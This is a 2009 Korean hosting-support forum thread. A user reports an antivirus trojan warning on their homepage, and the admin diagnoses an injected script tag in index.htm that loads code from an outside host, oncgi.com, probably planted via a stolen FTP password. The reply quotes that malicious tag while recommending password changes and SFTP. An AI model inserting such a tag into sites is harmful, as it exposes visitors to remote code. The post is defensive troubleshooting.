1. 자유게시판
  2. 기술지원
  3. 홈피 자랑
  4. FAQ



한국레드햇 너나우리 DNSEver qmail.kldp.org 어드민플레이

기술지원 요청하실 땐 계정명을 밝혀주시는 센스 부탁드리겠습니다.


제 홈페이지 인덱스 페이지 들어갈때마다

알약 실시간 감시에서

트로이 목마/해킹툴
 Trojan.Script.209951

이라는게 뜹니다.
치료를해도 인덱스페이지 들어가면 또다시 뜨는데요;ㅁ;
어떻게 해야 되나요.

 

조회 수 :
1541
등록일 :
2009.12.03
12:08:08 (*.129.206.163)
엮인글 :
http://hosting.digimoon.net/board/27440/fa3/trackback
게시글 주소 :
http://hosting.digimoon.net/board/27440

[레벨:15]id: 디지문디지문

2009.12.03
20:15:17
(*.74.175.5)
저는 네이버 PC그린 쓰고 있는데 바이러스 경고창은 안 뜨더군요.
알약 깔아 테스트해 보니 첨부하신 이미지처럼 경고창이 뜨네요.

쿠키 파일 열어보니 index.htm 파일 안에 <script src=http://oncgi.com?TVRJeE1USXhORGt4Tmc9PQ==> </script> 요 소스 있는 부분을 알약에서 악성 스크립트로 감지하는 것입니다.
해당 소스를 직접 인덱스에 넣으신 건지요? 그렇다면 삭제하시면 되겠죠.
index.htm 파일의 생성 날짜가 12월 1일로 가장 최근이네요. 그 날 카운터를 다신 모양이군요.

아니라면 불법적인 루트로 스텍님의 FTP 패스워드가 뚫렸을 확률이 99프로입니다.
원래 FTP가 패킷 스니핑에 취약한데다 인터넷을 이용하면서 PC가 악성코드에 감염되었을 경우 알FTP와 같은 FTP 클라이언트 프로그램에 패스워드를 저장해서 쓰는 경우 바로 탈취당하게 됩니다. 패스워드 암만 복잡하게 설정해 봤자 무용지물이라는 것이죠. 그러면 크래커는 손쉽게 스텍님의 계정으로 FTP에 로그인하여 위와 같은 짧은 스크립트 코드를 인덱스에 심는 것만으로도 사이트에 접속할 때마다 스크립트에 포함된 URL로 패킷을 흘려보내는 수법을 쓸 수 있게 됩니다.
정말 이런 경우라면 FTP 패스워드를 변경하고 가급적이면 FTPS나 SFTP를 이용할 것을 권장합니다. 악성코드에 감염된 PC라 할지라도 FTPS나 SFTP를 사용하면 패킷이 암호화되어 서버로 전송되기에 가로채어봤자 소득이 없어 FTP보다 보안상 훨씬 안전합니다.
List of Articles
번호 제목 글쓴이 날짜 조회 수
공지 개인정보 노출이 불가피한 경우가 아니라면 쪽지나 비밀글로 질문하지 마세요 [3] [3] [레벨:15]id: 디지문디지문 2007-10-24 26146
공지 기술지원 요청하실 땐 최소한 자신의 계정명은 밝혀 주세요(냉무) [레벨:15]id: 디지문디지문 2009-07-13 23819
» index페이지 들어갈때마다 ;ㅁ; 이런게 떠요 [1] imagefile [레벨:1]스텍 2009-12-03 1541
394 트래픽이 좀 심한모양이네요; [1] secret [레벨:1]자몽 2009-11-29 5
393 혹시 그림용량... [2] [레벨:1]레노 2009-11-21 1475
392 FTP가 되지 않습니다. [1] [레벨:1]SCom 2009-11-21 1415
391 갑자기 접속이 안될때.. [1] secret [레벨:1]예리한나 2009-11-20 4
390 엑소버드 플레이어가 나오지 않아요 ; [1] secret [레벨:3]id: 미향メ 2009-11-06 2
389 흠 질문 ! [1] secret [레벨:3]id: 미향メ 2009-11-06 1
388 큭 ..; 이건 무슨 에러인가요 ; [1] secret [레벨:3]id: 미향メ 2009-11-06 1
387 질문이요 ㅇㅅㅇ.. [1] secret [레벨:3]id: 미향メ 2009-11-05 1
386 끄응.. 블랙리스트 에러나네요 ㅠ [3] secretimage [레벨:1]XYZ 2009-10-30 7
385 도메인 연결 부탁드립니다. [3] [레벨:1]Ducky 2009-10-27 1702
384 도메인 연결 부탁드립니다. (재요청) [2] secret [레벨:1]앙다문 2009-10-25 3
383 아침에 접속속도가 느립니다. [2] [레벨:1]앙다문 2009-10-24 1505
382 블랙리스트 에러인 듯 합니다. [2] [레벨:0]파파 2009-10-22 1524
381 도메인 연결 부탁드립니다. [2] secret [레벨:1]앙다문 2009-10-22 2
380 블랙리스트 에러 [3] secret [레벨:1]waof 2009-10-21 4
379 ftp접속 리눅스.. [1] [레벨:4]fcagu 2009-10-18 1771
378 도메인 연결 신청드립니다. [1] [레벨:1]인육 2009-10-18 1680
377 아이피관련 에러문의드립니다 [1] [레벨:1]자몽 2009-10-15 1726
376 질문드립니다 :3 [7] secret [레벨:1]waof 2009-10-14 9
375 로그인이 안됨.. [7] secret [레벨:3]FolderFILE 2009-10-13 6
374 XE 로그인/글쓰기 랜덤 에러가 뜨네요. [1] [레벨:1]민뜨 2009-10-10 1990
373 도메인 연결 [1] [레벨:1]스낵 2009-10-08 1523
372 FTP 접속이 안됩니다 [1] secret [레벨:1]쿠마 2009-10-07 1
371 백업 복구 부탁드립니다 [1] secret [레벨:1]쿠마 2009-10-07 3
370 백업 요청합니다. [1] secret [레벨:3]id: 미향メ 2009-10-06 2
369 네임서버 문의. [1] secret [레벨:3]id: 미향メ 2009-10-02 1
368 네임서버 연결 해주세요 ^^ [1] secret [레벨:3]id: 미향メ 2009-10-02 2
367 ftp접속에 관해서인데,, [1] [레벨:0]afd 2009-09-30 1489
366 질문 ! [1] secret [레벨:3]id: 미향メ 2009-09-30 1